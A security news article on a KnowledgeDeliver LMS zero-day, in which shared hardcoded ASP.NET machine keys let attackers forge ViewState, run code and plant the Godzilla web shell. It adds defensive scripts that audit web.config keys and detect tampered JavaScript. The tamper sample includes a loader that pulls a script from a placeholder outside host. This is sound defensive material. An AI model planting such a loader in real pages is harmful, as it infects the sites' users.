
KnowledgeDeliver zero-day lets attackers plant Godzilla backdoors

KnowledgeDeliver zero-day – A critical KnowledgeDeliver LMS vulnerability has been exploited as a zero-day to deploy the Godzilla web shell, with attackers able to execute code without authentication. The root cause, Mandiant says, traces back to shared hardcoded ASP.NET machine keys acr

By the time investigators traced it back, the damage was already baked into the server.

Hackers exploited a critical zero-day vulnerability in a server running the KnowledgeDeliver learning management system (LMS) to deploy the Godzilla web shell. The flaw, documented as CVE-2026-5426, is a deserialization issue that can be exploited without authentication.

What made this intrusion especially dangerous wasn’t just the vulnerability itself, but the way KnowledgeDeliver customers were configured. The problem stems from the use of a shared hardcoded machine key in the web portal configuration across all KnowledgeDeliver customer deployments—an approach that turned a single secret into a reusable key for attackers.

The attack path ran through ASP.NET ViewState. Threat actors obtained the machine key and used it in ViewState deserialization attacks to sign malicious ViewState payloads, achieving remote code execution at the operating system level.

Mandiant says it responded in late 2025 to an attack on a KnowledgeDeliver server. In that incident, the vulnerability was initially exploited as a zero-day to inject a malicious script into the web platform. Researchers also point to the configuration that enabled the early compromise: the use of “identical pre-shared ASP.NET machine keys across multiple customer deployments,” a detail they say made the exploitation possible.

Mandiant adds that KnowledgeDeliver installations deployed before Feb. 24, 2026 depended on a standardized web.config file provided by the vendor. That configuration file contained hardcoded machineKey values used by the ASP.NET framework to encrypt and sign data, including ViewState payloads.
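The defensive takeaway from a vendor-shipped web.config is that a `<machineKey>` element with literal `validationKey`/`decryptionKey` values is a secret that must be unique per deployment, and that weak MAC settings make forged ViewState easier to pull off. The following audit script is an added example, not code from the article, Mandiant or the KnowledgeDeliver vendor. It parses a web.config (the embedded sample is constructed, not the real vendor file), flags static keys, weak `validation`/`decryption` algorithms and a disabled ViewState MAC, and emits a truncated SHA-256 fingerprint of the validation key so that operators can compare deployments for key reuse without sharing the key itself. The element names and attributes used are the standard ASP.NET ones; the fingerprint scheme and the `compare_fingerprints` grouping are assumptions of this example.

```python
"""Audit an ASP.NET web.config for hardcoded or weak <machineKey> settings."""
import hashlib
import xml.etree.ElementTree as ET

# Constructed sample resembling a vendor-shipped web.config with static keys.
# The key material here is a placeholder and not any real deployment's key.
SAMPLE_STATIC = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <pages enableViewStateMac="true" />
    <machineKey validationKey="ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789"
                decryptionKey="0123456789ABCDEF0123456789ABCDEF"
                validation="SHA1" decryption="AES" />
  </system.web>
</configuration>
"""

# Constructed sample using the framework's per-machine auto-generated keys.
SAMPLE_AUTO = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey validationKey="AutoGenerate,IsolateApps"
                decryptionKey="AutoGenerate,IsolateApps"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>
"""

WEAK_VALIDATION = {"MD5", "SHA1"}
WEAK_DECRYPTION = {"DES", "3DES"}


def fingerprint(secret: str) -> str:
    """Short SHA-256 fingerprint so keys can be compared without being disclosed (assumed scheme)."""
    return hashlib.sha256(secret.encode("utf-8")).hexdigest()[:16]


def audit_machine_key(xml_text: str) -> dict:
    """Return findings for the <machineKey> element of one web.config."""
    root = ET.fromstring(xml_text)
    result = {"findings": [], "validation_fingerprint": None}
    mk = root.find("./system.web/machineKey")
    pages = root.find("./system.web/pages")

    # A pages element that switches the ViewState MAC off defeats signature checks entirely.
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        result["findings"].append("enableViewStateMac is false: ViewState is not integrity-checked")

    if mk is None:
        # No element at all means ASP.NET auto-generates per-machine keys (fine for a single server).
        result["findings"].append("no machineKey element: framework auto-generates keys")
        return result

    for attr in ("validationKey", "decryptionKey"):
        value = mk.get(attr, "AutoGenerate")
        if not value.startswith("AutoGenerate"):
            result["findings"].append(f"{attr} is a static literal: verify it is unique to this deployment")
            if attr == "validationKey":
                result["validation_fingerprint"] = fingerprint(value)

    if mk.get("validation", "").upper() in WEAK_VALIDATION:
        result["findings"].append(f"weak validation algorithm {mk.get('validation')}: use HMACSHA256 or stronger")
    if mk.get("decryption", "").upper() in WEAK_DECRYPTION:
        result["findings"].append(f"weak decryption algorithm {mk.get('decryption')}: use AES")
    return result


def compare_fingerprints(deployments: dict) -> dict:
    """Group deployment names by validation-key fingerprint; any group larger than one is key reuse."""
    groups = {}
    for name, fp in deployments.items():
        if fp is not None:
            groups.setdefault(fp, []).append(name)
    return {fp: names for fp, names in groups.items() if len(names) > 1}


if __name__ == "__main__":
    for label, cfg in (("static", SAMPLE_STATIC), ("auto", SAMPLE_AUTO)):
        print(label, audit_machine_key(cfg))
    # Two constructed deployments shipped with the same web.config share a fingerprint.
    fps = {"customerA": audit_machine_key(SAMPLE_STATIC)["validation_fingerprint"],
           "customerB": audit_machine_key(SAMPLE_STATIC)["validation_fingerprint"],
           "customerC": audit_machine_key(SAMPLE_AUTO)["validation_fingerprint"]}
    print("shared keys:", compare_fingerprints(fps))
```

Run it against each deployment's web.config and feed only the fingerprints into `compare_fingerprints`; a group of two or more names is the shared-key condition the article describes, and the fix is to regenerate a distinct key per deployment (or move to auto-generated keys where there is no web farm).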

From there, the intrusion moved from code execution to persuasion. The malicious code on the platform “convinced users to download a fake installer,” Mandiant reports. Once users took the bait, their machine “got infected with a Cobalt Strike beacon,” effectively planting a backdoor.

Even the payload looked tailored. Mandiant says the payload was encrypted using a key that used the name of the compromised organization, indicating the threat actor prepared it for the targeted organization.

After that first foothold, the attackers delivered Godzilla itself. Mandiant says the threat actor deployed the .NET-based in-memory web shell, Godzilla (a.k.a. BlueBeam), which has also been used in similar attacks Microsoft observed in late 2024.


Godzilla isn’t new to the ViewState playbook. In August 2024, cybersecurity company ASEC reported that Godzilla was being deployed in ASP.NET environments in ViewState deserialization attacks targeting companies in the financial sector.

In the KnowledgeDeliver case, Mandiant notes the threat actor compromised KnowledgeDeliver instances and then executed commands to escalate control over the web server’s file system. That escalation included modifying an application JavaScript file with code that prompted users to install a “security authentication plugin,” along with instructions to load a malicious script from a domain under the attacker’s control.
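The modified JavaScript file is the kind of change a file-integrity check plus a simple allowlist of script origins catches early. The following script is an added example, not code from the article or from Mandiant; it baselines the SHA-256 of a web application's static files and flags both a hash mismatch and any script-loading URL whose host is not on the allowlist. The JavaScript samples, file names, the `.invalid` host and the allowlist are all constructed for the example.

```python
"""Detect tampered static JavaScript and unexpected remote script origins."""
import hashlib
import re

# Constructed baseline content for one application JavaScript file.
ORIGINAL_JS = """(function () {
  var api = 'https://lms.example.test/api/session';
  window.LmsApp = { sessionUrl: api };
})();
"""

# Constructed tampered copy: the original plus an appended loader pointing at an outside host.
TAMPERED_JS = ORIGINAL_JS + """
// appended prompt for a "security authentication plugin" (constructed sample)
var s = document.createElement('script');
s.src = 'https://cdn.example.invalid/plugin.js';
document.head.appendChild(s);
"""

# Hosts the application is expected to load scripts and resources from (assumed allowlist).
ALLOWED_HOSTS = {"lms.example.test"}

URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def sha256_text(text: str) -> str:
    """Hex SHA-256 of a file's text content, used as the integrity baseline."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def build_baseline(files: dict) -> dict:
    """Map file path -> SHA-256 for a known-good snapshot of the web root."""
    return {path: sha256_text(content) for path, content in files.items()}


def unexpected_hosts(js_text: str, allowed: set) -> list:
    """Return hosts referenced by URL in the script that are not on the allowlist."""
    hosts = URL_HOST_RE.findall(js_text)
    return sorted({h for h in hosts if h not in allowed})


def check_file(path: str, content: str, baseline: dict, allowed: set = ALLOWED_HOSTS) -> list:
    """Return a list of human-readable findings for one file; empty means clean."""
    findings = []
    expected = baseline.get(path)
    actual = sha256_text(content)
    if expected is None:
        findings.append(f"{path}: not in baseline (new file)")
    elif expected != actual:
        findings.append(f"{path}: hash mismatch (expected {expected[:12]}..., got {actual[:12]}...)")
    for host in unexpected_hosts(content, allowed):
        findings.append(f"{path}: references non-allowlisted host {host}")
    return findings


if __name__ == "__main__":
    baseline = build_baseline({"scripts/app.js": ORIGINAL_JS})
    print("original:", check_file("scripts/app.js", ORIGINAL_JS, baseline))
    print("tampered:", check_file("scripts/app.js", TAMPERED_JS, baseline))
```

The baseline should be generated from the vendor package or a clean deployment and stored off the web server, since an attacker with file-system control of the web root can rewrite anything kept beside the files it protects.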

The broader lesson is that machine keys reused across deployments keep resurfacing as an entry point for attackers. Over the past year, hackers have used improperly secured machine keys in ViewState deserialization attacks targeting web platforms for various products.

The same underlying weakness has already shown up elsewhere. In March last year, threat actors abused a hardcoded machine key to craft a malicious payload that allowed access to Gladinet CentreStack’s secure file-sharing servers. In July 2025, hackers compromised 85 Microsoft SharePoint servers after stealing the machine key to create signed malicious ViewState payloads. State-sponsored actors also used ViewState deserialization attacks to deploy a reconnaissance tool named WeepSteel on Sitecore servers that exposed the ASP.NET machine key.

Taken together, the KnowledgeDeliver incident paints a grim picture of what happens when a secret isn’t treated like a secret. In this case, a shared hardcoded machineKey value across customer deployments helped turn a single vulnerability into a repeatable path for attackers, ending with code execution, user deception, and a Godzilla web shell already in memory.
